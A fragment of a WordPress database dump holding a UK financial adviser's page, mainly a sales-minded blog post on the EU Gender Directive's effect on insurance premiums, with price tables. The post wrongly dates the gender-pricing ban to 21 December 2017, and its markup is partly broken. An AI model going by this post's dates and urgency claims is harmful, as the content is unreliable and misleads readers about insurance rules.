type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','publish','closed','closed','','financial-planning-for-divorcees','','','2018-12-19 10:03:41','2018-12-19 10:03:41','',0,'http://www.equalitywalk.org.uk/financial-planning-for-divorcees',0,'page','',0),(66,1,'2017-09-21 16:34:30','2017-09-21 16:34:30','<body class=\"single single-post postid-554 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4746\"><a href=\"/contact-us\">Contact</a></li>&#13;\n			</ul><div class=\"mobile-topnav-holder\"/>&#13;\n	</div>			</div>&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"header-info\">CALL US FREE ON <big><big><b/></big></big><span class=\"sep\">|</span><a href=\"mailto:Enquiries@equalitywalk.org.uk\">Enquiries@equalitywalk.org.uk</a></div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"/pensions\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pensions/pension-review\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"/best-annuity-rates\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"/better-pension-drawdown-annuity\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-3 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/investments\">Investments</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\"><span class=\"fusion-megamenu-bullet\"/>ISAs</a></li>&#13;\n		<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\"><span class=\"fusion-megamenu-bullet\"/>Lump Sum Investment</a></li>&#13;\n		<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\"><span class=\"fusion-megamenu-bullet\"/>Offshore Bonds</a></li>&#13;\n		<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\"><span class=\"fusion-megamenu-bullet\"/>Unit Trusts &amp; OEICs</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/trusts\">Trusts</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\"><span class=\"fusion-megamenu-bullet\"/>Asset Protection Trust</a></li>&#13;\n		<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\"><span class=\"fusion-megamenu-bullet\"/>Discretionary Trusts</a></li>&#13;\n		<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\"><span class=\"fusion-megamenu-bullet\"/>Absolute Trusts</a></li>&#13;\n		<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\"><span class=\"fusion-megamenu-bullet\"/>Gift &amp; Loan Trust</a></li>&#13;\n		<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\"><span class=\"fusion-megamenu-bullet\"/>Wills and Trust</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\"><span class=\"fusion-megamenu-bullet\"/>Critical Illness</a></li>&#13;\n		<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\"><span class=\"fusion-megamenu-bullet\"/>Serious Illness</a></li>&#13;\n		<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\"><span class=\"fusion-megamenu-bullet\"/>Relevant Life Plan</a></li>&#13;\n		<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\"><span class=\"fusion-megamenu-bullet\"/>Life Insurance</a></li>&#13;\n		<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\"><span class=\"fusion-megamenu-bullet\"/>Business Protection</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"/category/video-2\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"/pension-reforms-offer-freedom-savers\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"/staging-date-social-advisors\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"/automatic-enrolment\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"/our-blog\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"/category/annuities\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8588\"><a href=\"/category/insurance-protection\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"/category/investments\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"/category/pensions\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"/category/trusts\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"/category/wealth-management\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"\" style=\"\">&#13;\n										<div id=\"post-554\" class=\"post-554 post type-post status-publish format-standard has-post-thumbnail hentry category-insurance-protection post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">G-day – Impact of the Gender Directive on Insurance</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2>The price of some Insurance Protection is likely to increase by up to 25% after December 21st – Understand how it could affect you.</h2>&#13;\n<p>Source: Association of British Insurers (ABI)</p>&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #800000;\">Countdown to G -Day</span></h1>&#13;\n<h2 style=\"text-align: center;\">What is the Gender Directive?</h2>&#13;\n<h3 style=\"text-align: center;\"><span style=\"color: #800000;\">On 1 March 2011 The European Court of Justice (ECJ) ruled that from 21 December 2017, insurance companies won’t be able to charge people different amounts based on gender</span>&#13;\n<h3 style=\"text-align: center;\">When it comes to the cost of insurance, you could say that women have had an easier time of it than men. But that is about to change…&#13;\n<h4> What financial products are impacted upon by the Gender Directive?</h4>&#13;\n</h3></h3><p>The Gender Directive will apply to any financial product that uses gender as a factor for calculating the cost of insurance premiums. The following products (and this is by no means an exhaustive list) will be affected by the new ruling:</p>&#13;\n<ul><li>Life Cover</li>&#13;\n<li>Critical Illness Cover</li>&#13;\n<li>Income Protection Cover</li>&#13;\n<li>Annuities (retirement income)</li>&#13;\n<li>Car Insurance</li>&#13;\n</ul><h1 style=\"text-align: center;\"/>&#13;\n<div style=\"text-align: center;\"><em> Indication of how policies will change in price after the 21st December</em></div>&#13;\n<div style=\"text-align: center;\"><em/></div>&#13;\n<table class=\"aligncenter\" summary=\"How prices might change post G-day\" rules=\"all\"><thead><tr><th scope=\"col\"/>&#13;\n<th scope=\"col\">Male</th>&#13;\n<th scope=\"col\">Female</th>&#13;\n</tr></thead><tbody><tr><th scope=\"row\">Income Protection</th>&#13;\n<td><span style=\"color: #800000;\">+25%</span></td>&#13;\n<td>-30%</td>&#13;\n</tr><tr><th scope=\"row\">Critical Illness</th>&#13;\n<td>-5%</td>&#13;\n<td><span style=\"color: #800000;\">+10%</span></td>&#13;\n</tr><tr><th scope=\"row\">Term</th>&#13;\n<td>-10%</td>&#13;\n<td><span style=\"color: #800000;\">+20%</span><span style=\"text-align: center;\"> </span></td>&#13;\n</tr></tbody></table><h1 style=\"text-align: center;\"/>&#13;\n<h4 style=\"text-align: center;\">Let’s see how this will affect your wallet ( The Losers)</h4>&#13;\n<p><em>For a 39 year old non-smoker male  buying £2000 per month income protection – paying out after 8 weeks to age 65.</em></p>&#13;\n<p>Male</p>&#13;\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"2\"><thead><tr><th scope=\"col\">Current Premium</th>&#13;\n<th scope=\"col\">Potential Gender and I minus E effect</th>&#13;\n<th scope=\"col\">Indicative premium from 21 December 2017</th>&#13;\n<th scope=\"col\">The impact</th>&#13;\n</tr></thead><tbody><tr><td>£63.95</td>&#13;\n<td><span style=\"color: #800000;\">+ 25%</span></td>&#13;\n<td>£79.93</td>&#13;\n<td>An increase of £15.98 a month. Amounting to <span style=\"color: #800000;\">£4794.60</span> more over the full term</td>&#13;\n</tr></tbody></table><p>Female</p>&#13;\n<p><em>For a 45 year female non smoker buying £150,000 life cover over a 20 year term</em></p>&#13;\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"2\"><thead><tr><th scope=\"col\">Current Premium</th>&#13;\n<th scope=\"col\">Potential Gender and I minus E effect</th>&#13;\n<th scope=\"col\">Indicative premium from 21 December 2017</th>&#13;\n<th scope=\"col\">The impact</th>&#13;\n</tr></thead><tbody><tr><td>£20.03</td>&#13;\n<td><span style=\"color: #800000;\">+ 22%</span></td>&#13;\n<td>£24.44</td>&#13;\n<td>An increase of £4.41 a month. Amounting to <span style=\"color: #800000;\">£1,058.40</span> more over the full term</td>&#13;\n</tr></tbody></table><p><em>source LV= analysis, June 2017</em></p>&#13;\n<p><span style=\"color: #5f6062;\"><span style=\"font-family: Helvetica, Arial, sans-serif;\"><span style=\"font-size: small;\">These statistics stand as a hard reminder to  <span style=\"color: #800000;\">ACT NOW</span>, particularly if you have been wavering on whether or not it’s the right time to look at applying for personal protection .If you wait, you may end up paying far more for the same policy. </span></span></span></p>&#13;\n<p><span><span style=\"color: #800000;\">To increase the likelihood of beating the G Day deadline, we should have in mind a target 21 October deadline for submitting protection cases. Complete the contact form  so we can help you protect yourself and your loved ones before policy prices increase. </span></span></p>&#13;\n<blockquote><p>So don’t search the Internet any longer for the best price. We pride ourselves in finding the best suited policy for you, one that is affordable and the most likely to pay out if there was any cause to claim.</p></blockquote>&#13;\n<div><img src=\"/wp-content/uploads/2012/09/paul-reynolds.jpg\" alt=\"Becky Barnet\" width=\"68\" height=\"96\"/></div>&#13;\n<div>,<br/>&#13;\nInsurance Solutions Manager<br/>&#13;\nEquity SMART</div>&#13;\n<div/>&#13;\n<div/>&#13;\n<div class=\"review male\"><blockquote><q/></blockquote></div>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n<h4/>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"/author/sallyannhunt\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"/category/insurance-protection\" title=\"View all posts in Insurance Protection\" rel=\"category tag\">Insurance Protection</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"/g-day-impact-gender-directive-insurance\" title=\"Comment on G-day – Impact of the Gender Directive on Insurance\">1 Comment</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/&amp;p[title]=G-day%20%E2%80%93%20Impact%20of%20the%20Gender%20Directive%20on%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=G-day+-+Impact+of+the+Gender+Directive+on+Insurance%20http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/&amp;title=G-day%20%E2%80%93%20Impact%20of%20the%20Gender%20Directive%20on%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/&amp;title=G-day%20%E2%80%93%20Impact%20of%20the%20Gender%20Directive%20on%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fg-day-impact-gender-directive-insurance%2F&amp;name=G-day+-+Impact+of+the+Gender+Directive+on+Insurance&amp;description=The+price+of+some+Insurance+Protection+is+likely+to+increase+by+up+to+25%25+after+December+21st+%26%238211%3B+Understand+how+it+could+affect+you.+Source%3A%C2%A0Association+of+British+Insurers+%28ABI%29+Countdown+to+G+-Day+What+is+the+Gender+Directive%3F+On+1+March+2011+The+European+Court+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=G-day – Impact of the Gender Directive on Insurance&amp;body=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"/author/sallyannhunt\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n	<div id=\"comments\" class=\"comments-container\">&#13;\n		<div class=\"title\"><h2>One Comment</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n&#13;\n		<ol class=\"commentlist\"><li class=\"pingback even thread-even depth-1\" id=\"comment-205\">&#13;\n&#13;\n		<div class=\"the-comment\">&#13;\n			<div class=\"avatar\">&#13;\n							</div>&#13;\n&#13;\n			<div class=\"comment-box\">&#13;\n&#13;\n				<div class=\"comment-author meta\">&#13;\n					<a href=\"http://www.silverhairs.com/men-advised-to-act-now-on-annuities-before-g-day/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-commentauthor\',\'http://www.silverhairs.com\']);\" rel=\"external nofollow\" class=\"url\">Men advised to act now on Annuities before G-Day - Silverhairs</a>&#13;\n					